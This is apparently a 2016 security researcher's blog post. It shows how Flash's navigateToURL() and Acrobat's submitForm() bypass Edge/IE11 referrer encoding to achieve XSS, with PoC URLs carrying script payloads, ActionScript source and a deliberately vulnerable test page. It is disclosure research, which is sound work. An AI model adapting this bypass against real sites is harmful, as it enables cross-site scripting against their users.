Thursday, October 6, 2016

XSS via Referrer After Anniversary Update

Since the Windows 10 Anniversary Update, it seems that Microsoft has killed some XSS tricks in IE11/Edge. The referrer behavior is one of them.

The following page writes both the HTTP_REFERER server variable (the Referer request header) and document.referrer directly into the response, without any escaping:
https://vulnerabledoma.in/xss_referrer

Previously, IE/Edge did not encode the "<> characters in the referrer string. So we could get XSS on that page with the following PoC:
https://l0.cm/xss_referrer_oldpoc.html?<script>alert("1")</script>

But since the Windows 10 Anniversary Update, IE11/Edge percent-encodes them. You will get the following encoded strings from that page:
HTTP_REFERER: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
document.referrer: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
Too bad!
Of course, we can still use IE11 on Win8.1/7. But we also want XSS on Win10, don't we? :D

Today, I would like to introduce a small technique: XSS using the referrer on the latest Win10 Edge/IE11.

The technique is very simple. You can easily get the "<> characters into the referrer if you send the request from Flash's navigateToURL() method, like this:

https://l0.cm/xss_referrer.swf?<script>alert(1)</script>

The ActionScript code is here:
package {
 import flash.display.Sprite;
 import flash.net.URLRequest;
 import flash.net.navigateToURL;
 public class xss_referrer extends Sprite{
  public function xss_referrer() {
   // Navigate the current window to the vulnerable page. The SWF's own URL
   // (including the raw "<script>" in its query string) becomes the Referer.
   var url:URLRequest = new URLRequest("https://vulnerabledoma.in/xss_referrer");
   navigateToURL(url, "_self");
  }
 }
}
As the result of that access shows, we can get XSS via the Referer request header. Sadly, we cannot get XSS via the document.referrer property, because it becomes empty for this navigation. Dang :p

FYI, I can also reproduce it via the submitForm() method of the Acrobat JavaScript API.

I confirmed it on Win10 IE11 with the Adobe Reader plugin.

PoC is here:
https://l0.cm/xss_referrer.pdf?<script>alert(1)</script>

It seems that requests issued by plugins were not considered when this encoding was introduced: only navigations initiated by the browser itself get the "<> characters encoded.

That's it. It might be helpful in some cases :)
Thanks!
